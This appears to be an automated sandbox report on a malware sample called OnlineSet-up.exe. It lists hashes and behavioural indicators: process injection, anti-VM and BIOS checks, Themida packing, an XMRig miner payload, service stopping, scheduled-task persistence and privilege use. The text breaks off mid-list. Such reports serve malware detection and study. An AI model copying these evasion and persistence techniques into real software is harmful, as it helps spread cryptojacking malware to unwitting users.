Analysis
-
max time kernel
305s -
max time network
318s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
21-05-2023 20:53
Behavioral task
behavioral1
Sample
Folder/OnlineSet-up.exe
Resource
win7-20230220-en
General
-
Target
Folder/OnlineSet-up.exe
-
Size
685.3MB
-
MD5
3890f04895fa29ca24469e4c52e44b1f
-
SHA1
4c944be0bf5cecff8334d783a387de8043bde9be
-
SHA256
a1f4e4cd0c62e2cfa8ebdcb90800cdcd028b0302a60714ce8fb122e8d7d4a9fa
-
SHA512
68b53ea7c5312e14dcae727d14856360e07535a034ce0b899b0714efd1cc3d25d9c778718bddb81267a10a4283278b0a1793e973e4abd95acac2485d72364268
-
SSDEEP
393216:hrR+SknsQiN9pmGKLnqIgxBnpWmxuis8LrqSGl:VR+SknLepQTqIGnpWHisj
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
4libazcv.azb.exeGameBar.exedescription pid process target process PID 3728 created 3128 3728 4libazcv.azb.exe Explorer.EXE PID 3728 created 3128 3728 4libazcv.azb.exe Explorer.EXE PID 3728 created 3128 3728 4libazcv.azb.exe Explorer.EXE PID 3728 created 3128 3728 4libazcv.azb.exe Explorer.EXE PID 3728 created 3128 3728 4libazcv.azb.exe Explorer.EXE PID 3728 created 3128 3728 4libazcv.azb.exe Explorer.EXE PID 2404 created 3128 2404 GameBar.exe Explorer.EXE PID 2404 created 3128 2404 GameBar.exe Explorer.EXE PID 2404 created 3128 2404 GameBar.exe Explorer.EXE PID 2404 created 3128 2404 GameBar.exe Explorer.EXE PID 2404 created 3128 2404 GameBar.exe Explorer.EXE PID 2404 created 3128 2404 GameBar.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
4libazcv.azb.exeGameBar.exeSourceCode.exeSourceCode.exeSourceCode.exeSourceCode.exewmlxnd0h.o2x.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4libazcv.azb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GameBar.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SourceCode.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SourceCode.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SourceCode.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ SourceCode.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ wmlxnd0h.o2x.exe -
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2404-9040-0x00007FF6EB640000-0x00007FF6EC193000-memory.dmp xmrig -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 34 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral2/memory/4532-133-0x0000000000140000-0x0000000002A08000-memory.dmp net_reactor behavioral2/memory/4532-135-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-136-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-138-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-140-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-142-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-144-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-146-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-148-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-150-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-152-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-154-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-156-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-158-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-160-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-162-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-164-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-166-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-168-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-170-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-172-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-174-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-176-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-178-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-180-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-182-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-184-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-186-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-188-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-190-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-192-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-194-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-196-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor behavioral2/memory/4532-198-0x000000001D7B0000-0x000000001D900000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmlxnd0h.o2x.exe4libazcv.azb.exeSourceCode.exeSourceCode.exeGameBar.exeSourceCode.exeSourceCode.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmlxnd0h.o2x.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4libazcv.azb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4libazcv.azb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GameBar.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wmlxnd0h.o2x.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GameBar.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion SourceCode.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SourceCode.exe -
Executes dropped EXE 7 IoCs
Processes:
wmlxnd0h.o2x.exe4libazcv.azb.exeGameBar.exeSourceCode.exeSourceCode.exeSourceCode.exeSourceCode.exepid process 3872 wmlxnd0h.o2x.exe 3728 4libazcv.azb.exe 2404 GameBar.exe 3528 SourceCode.exe 812 SourceCode.exe 4572 SourceCode.exe 1844 SourceCode.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe themida C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe themida C:\Users\Admin\AppData\Local\Temp\wmlxnd0h.o2x.exe themida behavioral2/memory/3872-8903-0x00007FF77E800000-0x00007FF77EF9D000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe themida C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe themida behavioral2/memory/3728-8917-0x00007FF7F2350000-0x00007FF7F2EA3000-memory.dmp themida behavioral2/memory/3872-8922-0x00007FF77E800000-0x00007FF77EF9D000-memory.dmp themida behavioral2/memory/3728-8924-0x00007FF7F2350000-0x00007FF7F2EA3000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\4libazcv.azb.exe themida behavioral2/memory/3728-8957-0x00007FF7F2350000-0x00007FF7F2EA3000-memory.dmp themida C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe themida behavioral2/memory/2404-8963-0x00007FF6EB640000-0x00007FF6EC193000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe themida C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe themida behavioral2/memory/3528-8967-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida behavioral2/memory/3528-8973-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe themida behavioral2/memory/2404-9040-0x00007FF6EB640000-0x00007FF6EC193000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe themida behavioral2/memory/812-9058-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida behavioral2/memory/812-9063-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe themida behavioral2/memory/4572-9090-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida C:\Users\Admin\AppData\Roaming\Github\SourceCode.exe themida behavioral2/memory/1844-9110-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida behavioral2/memory/1844-9115-0x00007FF703550000-0x00007FF703CED000-memory.dmp themida -
Processes:
SourceCode.exewmlxnd0h.o2x.exe4libazcv.azb.exeGameBar.exeSourceCode.exeSourceCode.exeSourceCode.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SourceCode.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wmlxnd0h.o2x.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4libazcv.azb.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GameBar.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SourceCode.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SourceCode.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA SourceCode.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 45 ip-api.com -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
wmlxnd0h.o2x.exe4libazcv.azb.exeGameBar.exeSourceCode.exeSourceCode.exeSourceCode.exeSourceCode.exepid process 3872 wmlxnd0h.o2x.exe 3728 4libazcv.azb.exe 2404 GameBar.exe 3528 SourceCode.exe 812 SourceCode.exe 4572 SourceCode.exe 1844 SourceCode.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
OnlineSet-up.exeGameBar.exedescription pid process target process PID 4532 set thread context of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 2404 set thread context of 1168 2404 GameBar.exe conhost.exe PID 2404 set thread context of 4608 2404 GameBar.exe dwm.exe -
Drops file in Program Files directory 2 IoCs
Processes:
4libazcv.azb.exeGameBar.exedescription ioc process File created C:\Program Files\WindowsApsss\MicrosoftXboxGamingOverlays\GameBar.exe 4libazcv.azb.exe File created C:\Program Files\Google\Libs\WR64.sys GameBar.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1172 sc.exe 3596 sc.exe 4500 sc.exe 1256 sc.exe 636 sc.exe 3988 sc.exe 5000 sc.exe 1960 sc.exe 3956 sc.exe 4828 sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
MSBuild.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 MSBuild.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
OnlineSet-up.exeMSBuild.exe4libazcv.azb.exepowershell.exepowershell.exeGameBar.exepowershell.exepowershell.exedwm.exepid process 4532 OnlineSet-up.exe 4532 OnlineSet-up.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 5004 MSBuild.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 2660 powershell.exe 2660 powershell.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 1776 powershell.exe 1776 powershell.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 3728 4libazcv.azb.exe 2404 GameBar.exe 2404 GameBar.exe 1812 powershell.exe 1812 powershell.exe 2404 GameBar.exe 2404 GameBar.exe 2404 GameBar.exe 2404 GameBar.exe 2404 GameBar.exe 2404 GameBar.exe 3628 powershell.exe 3628 powershell.exe 2404 GameBar.exe 2404 GameBar.exe 2404 GameBar.exe 2404 GameBar.exe 4608 dwm.exe 4608 dwm.exe 4608 dwm.exe 4608 dwm.exe 4608 dwm.exe 4608 dwm.exe 4608 dwm.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
OnlineSet-up.exeMSBuild.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4532 OnlineSet-up.exe Token: SeDebugPrivilege 5004 MSBuild.exe Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeShutdownPrivilege 4024 powercfg.exe Token: SeCreatePagefilePrivilege 4024 powercfg.exe Token: SeShutdownPrivilege 4908 powercfg.exe Token: SeCreatePagefilePrivilege 4908 powercfg.exe Token: SeShutdownPrivilege 832 powercfg.exe Token: SeCreatePagefilePrivilege 832 powercfg.exe Token: SeShutdownPrivilege 4840 powercfg.exe Token: SeCreatePagefilePrivilege 4840 powercfg.exe Token: SeIncreaseQuotaPrivilege 1776 powershell.exe Token: SeSecurityPrivilege 1776 powershell.exe Token: SeTakeOwnershipPrivilege 1776 powershell.exe Token: SeLoadDriverPrivilege 1776 powershell.exe Token: SeSystemProfilePrivilege 1776 powershell.exe Token: SeSystemtimePrivilege 1776 powershell.exe Token: SeProfSingleProcessPrivilege 1776 powershell.exe Token: SeIncBasePriorityPrivilege 1776 powershell.exe Token: SeCreatePagefilePrivilege 1776 powershell.exe Token: SeBackupPrivilege 1776 powershell.exe Token: SeRestorePrivilege 1776 powershell.exe Token: SeShutdownPrivilege 1776 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeSystemEnvironmentPrivilege 1776 powershell.exe Token: SeRemoteShutdownPrivilege 1776 powershell.exe Token: SeUndockPrivilege 1776 powershell.exe Token: SeManageVolumePrivilege 1776 powershell.exe Token: 33 1776 powershell.exe Token: 34 1776 powershell.exe Token: 35 1776 powershell.exe Token: 36 1776 powershell.exe Token: SeIncreaseQuotaPrivilege 1776 powershell.exe Token: SeSecurityPrivilege 1776 powershell.exe Token: SeTakeOwnershipPrivilege 1776 powershell.exe Token: SeLoadDriverPrivilege 1776 powershell.exe Token: SeSystemProfilePrivilege 1776 powershell.exe Token: SeSystemtimePrivilege 1776 powershell.exe Token: SeProfSingleProcessPrivilege 1776 powershell.exe Token: SeIncBasePriorityPrivilege 1776 powershell.exe Token: SeCreatePagefilePrivilege 1776 powershell.exe Token: SeBackupPrivilege 1776 powershell.exe Token: SeRestorePrivilege 1776 powershell.exe Token: SeShutdownPrivilege 1776 powershell.exe Token: SeDebugPrivilege 1776 powershell.exe Token: SeSystemEnvironmentPrivilege 1776 powershell.exe Token: SeRemoteShutdownPrivilege 1776 powershell.exe Token: SeUndockPrivilege 1776 powershell.exe Token: SeManageVolumePrivilege 1776 powershell.exe Token: 33 1776 powershell.exe Token: 34 1776 powershell.exe Token: 35 1776 powershell.exe Token: 36 1776 powershell.exe Token: SeIncreaseQuotaPrivilege 1776 powershell.exe Token: SeSecurityPrivilege 1776 powershell.exe Token: SeTakeOwnershipPrivilege 1776 powershell.exe Token: SeLoadDriverPrivilege 1776 powershell.exe Token: SeSystemProfilePrivilege 1776 powershell.exe Token: SeSystemtimePrivilege 1776 powershell.exe Token: SeProfSingleProcessPrivilege 1776 powershell.exe Token: SeIncBasePriorityPrivilege 1776 powershell.exe Token: SeCreatePagefilePrivilege 1776 powershell.exe Token: SeBackupPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 57 IoCs
Processes:
OnlineSet-up.exeMSBuild.exewmlxnd0h.o2x.execmd.execmd.execmd.execmd.execmd.exeGameBar.exedescription pid process target process PID 4532 wrote to memory of 1488 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 1488 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 1488 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 4532 wrote to memory of 5004 4532 OnlineSet-up.exe MSBuild.exe PID 5004 wrote to memory of 3872 5004 MSBuild.exe wmlxnd0h.o2x.exe PID 5004 wrote to memory of 3872 5004 MSBuild.exe wmlxnd0h.o2x.exe PID 3872 wrote to memory of 4784 3872 wmlxnd0h.o2x.exe schtasks.exe PID 3872 wrote to memory of 4784 3872 wmlxnd0h.o2x.exe schtasks.exe PID 5004 wrote to memory of 3728 5004 MSBuild.exe 4libazcv.azb.exe PID 5004 wrote to memory of 3728 5004 MSBuild.exe 4libazcv.azb.exe PID 380 wrote to memory of 1172 380 cmd.exe sc.exe PID 380 wrote to memory of 1172 380 cmd.exe sc.exe PID 380 wrote to memory of 1960 380 cmd.exe sc.exe PID 380 wrote to memory of 1960 380 cmd.exe sc.exe PID 380 wrote to memory of 3956 380 cmd.exe sc.exe PID 380 wrote to memory of 3956 380 cmd.exe sc.exe PID 380 wrote to memory of 4828 380 cmd.exe sc.exe PID 380 wrote to memory of 4828 380 cmd.exe sc.exe PID 380 wrote to memory of 3596 380 cmd.exe sc.exe PID 380 wrote to memory of 3596 380 cmd.exe sc.exe PID 1440 wrote to memory of 4024 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 4024 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 4908 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 4908 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 832 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 832 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 4840 1440 cmd.exe powercfg.exe PID 1440 wrote to memory of 4840 1440 cmd.exe powercfg.exe PID 2544 wrote to memory of 4260 2544 cmd.exe choice.exe PID 2544 wrote to memory of 4260 2544 cmd.exe choice.exe PID 3356 wrote to memory of 4500 3356 cmd.exe sc.exe PID 3356 wrote to memory of 4500 3356 cmd.exe sc.exe PID 3356 wrote to memory of 1256 3356 cmd.exe sc.exe PID 3356 wrote to memory of 1256 3356 cmd.exe sc.exe PID 3356 wrote to memory of 636 3356 cmd.exe sc.exe PID 3356 wrote to memory of 636 3356 cmd.exe sc.exe PID 3356 wrote to memory of 3988 3356 cmd.exe sc.exe PID 3356 wrote to memory of 3988 3356 cmd.exe sc.exe PID 3356 wrote to memory of 5000 3356 cmd.exe sc.exe PID 3356 wrote to memory of 5000 3356 cmd.exe sc.exe PID 4252 wrote to memory of 1504 4252 